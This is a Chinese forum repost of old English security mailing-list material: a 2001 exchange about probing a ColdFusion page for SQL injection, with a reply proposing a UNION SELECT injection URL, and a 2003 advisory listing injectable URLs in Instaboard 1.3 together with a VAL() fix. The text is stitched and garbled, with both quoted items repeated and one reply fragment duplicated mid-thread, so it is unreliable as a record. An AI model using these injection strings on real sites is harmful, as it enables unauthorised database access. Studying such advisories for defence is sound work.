呵呵,基本和asp类似了,不过要看是什么平台支撑着,
文档有二篇,是以问问题的形式给出,发现国外对计算机上不管是教学还是文章,
都会比国内的教学幽默得多,学习起来轻松许多,哎,什么时候国内才可以变化
这样的情况,估计永远也等不到了,哎!
文档有二篇,是以问问题的形式给出,发现国外对计算机上不管是教学还是文章,
都会比国内的教学幽默得多,学习起来轻松许多,哎,什么时候国内才可以变化
这样的情况,估计永远也等不到了,哎!
Quote
It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:
Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID =
" & strPageID
This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:
http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
OtherTable WHERE 1=1
Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.
Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.
----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection
> Hello guys,
>
> I'm performing a pen-test against a web with Coldfusion installed. I
obtain
> some error information, but I'm not able to do nothing because the server
> never understand the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:/blabla/page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
It
> seems that it is not an SQL issue, instead it looks a coldfusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, i get an error from the SQL database. But still don't know how to
> take advantage of it. I don't know the database name and I have very
little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request: http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:
Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID =
" & strPageID
This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:
http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
OtherTable WHERE 1=1
Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.
Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.
----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection
> Hello guys,
>
> I'm performing a pen-test against a web with Coldfusion installed. I
obtain
> some error information, but I'm not able to do nothing because the server
> never understand the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:/blabla/page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
It
> seems that it is not an SQL issue, instead it looks a coldfusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, i get an error from the SQL database. But still don't know how to
> take advantage of it. I don't know the database name and I have very
little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request: http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
Quote
Affected Product: NetPleasure's Instaboard 1.3
www.netpleasure.com/instaboard/
Venerability: Multiple SQL Injection Vunerabilities.
http://server/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://server/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://server/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://server/instaboard/index.cfm?catid=1%20SQL
Notification:
Messages were posted on the Instaboard demo forum, in the "Instaboard 1.3
Troubleshooting and Problems" area, on April 02 2003. As of yet, there has
been no reply publicly or privately from thei author. Author emailed at
instaboard at netpleasure.com on Tue, 8 Apr 2003 16:06:19 -0400
Proposed Solution:
If you have the licensed version of the product, protect the numerical
values within the CFQUERY tags:
for example:
In queries/oraclen/qry_GetOriginalMessage.cfm
change
WHERE m.tpcid = #tpcid#
AND m.userid = u.userid
AND m.msgid = #msgid#
to
WHERE m.tpcid = #VAL(tpcid)#
AND m.userid = u.userid
AND m.msgid = #VAL(msgid)#
--
"Most moms teach their daughters how to run a house, but you? You teach
yours the fine art of mass destruction."
- Nabs - Goodbye is not forever
perl -le '$_="6110>374086;2064208213:90<307;55";tr[0->][ LEOR!AUBGNSTY];print'
www.netpleasure.com/instaboard/
Venerability: Multiple SQL Injection Vunerabilities.
http://server/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://server/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://server/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://server/instaboard/index.cfm?catid=1%20SQL
Notification:
Messages were posted on the Instaboard demo forum, in the "Instaboard 1.3
Troubleshooting and Problems" area, on April 02 2003. As of yet, there has
been no reply publicly or privately from thei author. Author emailed at
instaboard at netpleasure.com on Tue, 8 Apr 2003 16:06:19 -0400
Proposed Solution:
If you have the licensed version of the product, protect the numerical
values within the CFQUERY tags:
for example:
In queries/oraclen/qry_GetOriginalMessage.cfm
change
WHERE m.tpcid = #tpcid#
AND m.userid = u.userid
AND m.msgid = #msgid#
to
WHERE m.tpcid = #VAL(tpcid)#
AND m.userid = u.userid
AND m.msgid = #VAL(msgid)#
--
"Most moms teach their daughters how to run a house, but you? You teach
yours the fine art of mass destruction."
- Nabs - Goodbye is not forever
perl -le '$_="6110>374086;2064208213:90<307;55";tr[0->][ LEOR!AUBGNSTY];print'
203
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
